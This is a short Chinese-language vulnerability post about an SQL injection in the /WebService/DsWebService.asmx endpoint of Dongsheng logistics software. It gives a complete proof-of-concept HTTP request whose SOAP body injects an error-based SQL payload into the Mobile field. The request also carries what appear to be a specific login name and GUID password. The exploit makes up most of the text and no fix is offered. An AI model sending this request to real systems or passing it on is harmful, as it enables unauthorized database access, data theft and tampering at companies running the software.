漏洞描述
东胜物流软件是一款专为物流行业设计的管理软件,提供全面的物流管理解决方案。该软件的 /WebService/DsWebService.asmx 接口存在SQL注入漏洞,攻击者可以通过发送特制的SOAP请求注入恶意SQL语句,从而获取数据库中的敏感信息或对数据库进行未授权操作。此漏洞可能导致数据泄露、数据篡改等严重后果。
东胜物流软件 /WebService/DsWebService.asmx SQL 注入漏洞
PoC代码
POST /Webservice/DsWebService.asmx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/soap+xml;charset=UTF-8;action="DsWebService/GetSeaiBsDataList"
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:dsw="DsWebService">
<soap:Header/>
<soap:Body>
<dsw:GetSeaiBsDataList>
<!--Optional:-->
<dsw:LoginName>qdtaize</dsw:LoginName>
<!--Optional:-->
<dsw:LoginPass>EBBE3242-D49E-4398-BBFE-0133CA655EB5</dsw:LoginPass>
<!--Optional:-->
<dsw:Mobile>1') or 1=@@VERSION--</dsw:Mobile>
<!--Optional:-->
<dsw:Mblno>1</dsw:Mblno>
<dsw:start>1</dsw:start>
<dsw:limit>1</dsw:limit>
</dsw:GetSeaiBsDataList>
</soap:Body>
</soap:Envelope>